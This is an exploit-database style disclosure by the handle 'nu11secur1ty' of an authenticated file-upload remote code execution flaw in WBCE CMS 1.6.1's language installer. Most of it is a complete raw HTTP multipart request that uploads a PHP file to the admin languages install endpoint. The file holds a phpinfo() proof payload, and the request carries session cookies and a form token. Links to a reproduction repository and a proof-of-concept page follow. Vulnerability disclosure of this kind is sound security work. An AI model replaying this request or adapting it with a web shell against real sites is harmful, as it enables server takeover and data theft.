## Title: WBCE_CMS-1.6.1 File Upload - RCE ## Author: nu11secur1ty ## Date: 12/07/2023 ## Vendor: https://wbce-cms.org/ ## Software: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip ## Reference: https://portswigger.net/web-security/file-upload, https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload ## Description: The language module is vulnerable to file upload attacks. The upload function is not sanitizing well and the attacker can upload a PHP malicious script, then the attacker can execute it, without any restriction execution permissions! In this case, I execute the PHP script and create another file in the languages node in the app file system. I am a Penetration Tester, not a stupid cracker! Thank you all! STATUS: HIGH-CRITICAL Vulnerability [+]Exploit execution: ```POST POST /WBCE_CMS-1.6.1/wbce/admin/languages/install.php HTTP/1.1 Host: pwnedhost.com Cookie: admin_auth=eyJpdiI6Ii9pK2orL0tKdUI1dGZlb3NvdDUzcmc9PSIsInZhbHVlIjoicSs5Y3RjYjFvZ0tWS3pNaS9qcHhLUldERThMeDBxQXBrRDNZaDhWQlNtb05PdmVLcnFCdWR3dXBIZDZacnFYZy9YWE1rRURFazhTNHFtckFiN0lUNENiZ0p4UVA4SmJGR2tJK1ljemc0YkF3T1R5YmNXS3M4RkpMdWxCcmV1WnhDN2FXYTA2NG9HdTBqUnRoNUt0bVh3PT0iLCJtYWMiOiJjMzFiZDk0NmY4NTM3ODBhYzJkYWVjYzU0YTJkODA1NGQ1NTM5ZmNlN2FjMTBhNWMwZmUyMWUyMDhhYWQ3ODZhIiwidGFnIjoiIn0%3D; fusion3e5d5_visited=yes; fusion99apx_visited=yes; phpsessid-6304-sid=rnqsoulnul8qmrlpvc611gf592; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1701936358 Content-Length: 475 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://pwnedhost.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundary757KDXm0RNB2VYkn User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.199 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://pwnedhost.com/WBCE_CMS-1.6.1/wbce/admin/languages/index.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=0, i Connection: close ------WebKitFormBoundary757KDXm0RNB2VYkn Content-Disposition: form-data; name="formtoken" 64d899c3-53dcaf48f90c116fc048814b8841ec276b7555c4 ------WebKitFormBoundary757KDXm0RNB2VYkn Content-Disposition: form-data; name="userfile"; filename="info.php" Content-Type: application/octet-stream //@nu11secur1ty <?php phpinfo(); ?> ------WebKitFormBoundary757KDXm0RNB2VYkn Content-Disposition: form-data; name="submit" ------WebKitFormBoundary757KDXm0RNB2VYkn-- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/help.wbce/WBCE-1.6.1) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/12/wbcecms-161-file-upload-rce.html) ## Time spent: 00:37:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>